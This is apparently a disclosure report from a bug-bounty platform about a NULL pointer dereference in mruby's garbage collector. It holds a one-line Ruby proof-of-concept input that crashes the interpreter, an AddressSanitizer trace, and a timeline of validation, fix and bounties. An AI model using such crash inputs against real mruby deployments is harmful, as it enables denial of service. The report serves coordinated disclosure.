NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Oct 8th 2021


Description

NULL Pointer Dereference on mrb_full_gc

Proof of Concept

// PoC.js
def lambda = super { } [lambda] = @a ... ; lambda

Result

 ~/asan/mruby/bin/mruby crash.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==354==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556c5e8ddf2f bp 0x7ffe9a8ca4a0 sp 0x7ffe9a8ca480 T0)
==354==The signal is caused by a READ memory access.
==354==Hint: address points to the zero page.
    #0 0x556c5e8ddf2e in mrb_full_gc /root/asan/mruby/src/gc.c:1325
    #1 0x556c5e8de256 in mrb_garbage_collect /root/asan/mruby/src/gc.c:1358
    #2 0x556c5e8b58c7 in mrb_irep_incref /root/asan/mruby/src/state.c:114
    #3 0x556c5e965fd1 in mrb_proc_copy /root/asan/mruby/src/proc.c:212
    #4 0x556c5e966929 in proc_lambda /root/asan/mruby/src/proc.c:283
    #5 0x556c5e91fbb7 in mrb_vm_exec /root/asan/mruby/src/vm.c:1725
    #6 0x556c5e9112fb in mrb_vm_run /root/asan/mruby/src/vm.c:1032
    #7 0x556c5e9534d1 in mrb_top_run /root/asan/mruby/src/vm.c:2998
    #8 0x556c5e9ad4a0 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6891
    #9 0x556c5e9ad78e in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6934
    #10 0x556c5e8b5092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #11 0x7fd1ded600b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #12 0x556c5e8b242d in _start (/root/asan/mruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/src/gc.c:1325 in mrb_full_gc
==354==ABORTING
We have contacted a member of the mruby team and are waiting to hear back 2 months ago
We have contacted a member of the mruby team and are waiting to hear back 2 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 2 months ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on bec074 2 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty